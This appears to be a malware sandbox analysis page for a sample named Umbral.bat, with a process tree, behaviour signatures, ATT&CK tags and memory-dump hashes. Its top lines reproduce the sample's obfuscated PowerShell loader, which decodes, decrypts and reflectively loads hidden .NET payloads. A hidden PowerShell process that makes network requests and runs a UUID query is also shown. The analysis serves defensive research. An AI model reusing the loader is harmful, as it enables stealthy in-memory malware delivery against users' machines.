$dqAwB.CopyTo($BkPnB); $dqAwB.Dispose(); $LaItK.Dispose(); $BkPnB.Dispose(); $BkPnB.ToArray();}function execute_function($param_var,$param2_var){ $aRoAH=[System.Reflection.Assembly]::('daoL'[-1..-4] -join '')([byte[]]$param_var); $GgeTI=$aRoAH.EntryPoint; $GgeTI.Invoke($null, $param2_var);}$cxvio = 'C:\Users\Admin\AppData\Local\Temp\Umbral.bat';$host.UI.RawUI.WindowTitle = $cxvio;$jncrM=[System.IO.File]::('txeTllAdaeR'[-1..-11] -join '')($cxvio).Split([Environment]::NewLine);foreach ($EHnfk in $jncrM) { if ($EHnfk.StartsWith('qqYQzFlhLQoZwGnqjKHD')) { $uHvVU=$EHnfk.Substring(20); break; }}$payloads_var=[string[]]$uHvVU.Split('\');$payload1_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[0].Replace('#', '/').Replace('@', 'A'))));$payload2_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[1].Replace('#', '/').Replace('@', 'A'))));execute_function $payload1_var $null;execute_function $payload2_var (,[string[]] ('')); "
    3⤵
    PID:384
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -w hidden
    3⤵
    - Blocklisted process makes network request
    - Command and Scripting Interpreter: PowerShell
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    - Suspicious use of WriteProcessMemory
    PID:2960
  - - C:\Windows\System32\Wbem\wmic.exe
      "wmic.exe" csproduct get uuid
      4⤵
      PID:5064

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k ClipboardSvcGroup -p -s cbdhsvc
1⤵
PID:3660

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s wlidsvc
1⤵
PID:4952

C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s StorSvc
1⤵
PID:1032

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalServiceAndNoImpersonation -p -s SSDPSRV
1⤵
PID:1556

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s WinHttpAutoProxySvc
1⤵
- Modifies data under HKEY_USERS
PID:4884

C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k LocalService -p -s LicenseManager
1⤵
PID:2708

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s NgcCtnrSvc
1⤵
PID:3540

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Command and Scripting Interpreter

1

T1059

PowerShell

1

T1059.001

Persistence

Privilege Escalation

Defense Evasion

Credential Access

Discovery

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_suiqo4zi.0yh.ps1

Filesize
60B

MD5
d17fe0a3f47be24a6453e9ef58c94641

SHA1
6ab83620379fc69f80c0242105ddffd7d98d5d9d

SHA256
96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

SHA512
5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

Download Submit
memory/1012-79-0x00007FFDEEDB0000-0x00007FFDEEDC0000-memory.dmp

Filesize
64KB

Download
memory/1120-69-0x00007FFDEEDB0000-0x00007FFDEEDC0000-memory.dmp

Filesize
64KB

Download
memory/1292-76-0x00007FFDEEDB0000-0x00007FFDEEDC0000-memory.dmp

Filesize
64KB

Download
memory/1524-74-0x00007FFDEEDB0000-0x00007FFDEEDC0000-memory.dmp

Filesize
64KB

Download
memory/1652-77-0x00007FFDEEDB0000-0x00007FFDEEDC0000-memory.dmp

Filesize
64KB

Download
memory/1716-75-0x00007FFDEEDB0000-0x00007FFDEEDC0000-memory.dmp

Filesize
64KB

Download
memory/1764-73-0x00007FFDEEDB0000-0x00007FFDEEDC0000-memory.dmp

Filesize
64KB

Download
memory/1892-65-0x00007FFDEEDB0000-0x00007FFDEEDC0000-memory.dmp

Filesize
64KB

Download
memory/2232-66-0x00007FFDEEDB0000-0x00007FFDEEDC0000-memory.dmp

Filesize
64KB

Download
memory/2392-67-0x00007FFDEEDB0000-0x00007FFDEEDC0000-memory.dmp

Filesize
64KB

Download
memory/2400-78-0x00007FFDEEDB0000-0x00007FFDEEDC0000-memory.dmp

Filesize
64KB

Download
memory/2556-71-0x00007FFDEEDB0000-0x00007FFDEEDC0000-memory.dmp

Filesize
64KB

Download
memory/2764-80-0x00007FFDEEDB0000-0x00007FFDEEDC0000-memory.dmp

Filesize
64KB

Download
memory/2960-15-0x000002CB6FC60000-0x000002CB6FC68000-memory.dmp

Filesize
32KB

Download
memory/2960-13-0x000002CB6FC80000-0x000002CB6FCC4000-memory.dmp

Filesize
272KB

Download
memory/2960-116-0x00007FFE10540000-0x00007FFE11001000-memory.dmp

Filesize
10.8MB

Download
memory/2960-16-0x000002CB6FE20000-0x000002CB6FE7A000-memory.dmp

Filesize
360KB

Download
memory/2960-115-0x00007FFE10543000-0x00007FFE10545000-memory.dmp

Filesize
8KB

Download
memory/2960-0-0x00007FFE10543000-0x00007FFE10545000-memory.dmp

Filesize
8KB

Download
memory/2960-112-0x000002CB6FF20000-0x000002CB6FF60000-memory.dmp

Filesize
256KB

Download
memory/2960-14-0x000002CB6FEA0000-0x000002CB6FF16000-memory.dmp

Filesize
472KB

Download
memory/2960-99-0x00007FFE1E4D3000-0x00007FFE1E4D4000-memory.dmp

Filesize
4KB

Download
memory/2960-1-0x000002CB6FA00000-0x000002CB6FA22000-memory.dmp

Filesize
136KB

Download
memory/2960-12-0x00007FFE10540000-0x00007FFE11001000-memory.dmp

Filesize
10.8MB

Download
memory/2960-11-0x00007FFE10540000-0x00007FFE11001000-memory.dmp

Filesize
10.8MB

Download
memory/3520-64-0x00007FFDEEDB0000-0x00007FFDEEDC0000-memory.dmp

Filesize
64KB

Download
memory/3520-17-0x00000000026D0000-0x00000000026FA000-memory.dmp

Filesize
168KB

Download
memory/3540-72-0x00007FFDEEDB0000-0x00007FFDEEDC0000-memory.dmp

Filesize
64KB

Download
memory/3660-70-0x00007FFDEEDB0000-0x00007FFDEEDC0000-memory.dmp

Filesize
64KB

Download
memory/4884-68-0x00007FFDEEDB0000-0x00007FFDEEDC0000-memory.dmp

Filesize
64KB

Download

Analysis

Sharing

General

Malware Config

Extracted

Signatures

Processes

Network

MITRE ATT&CK Enterprise v15

Replay Monitor

Loading Replay Monitor...

Downloads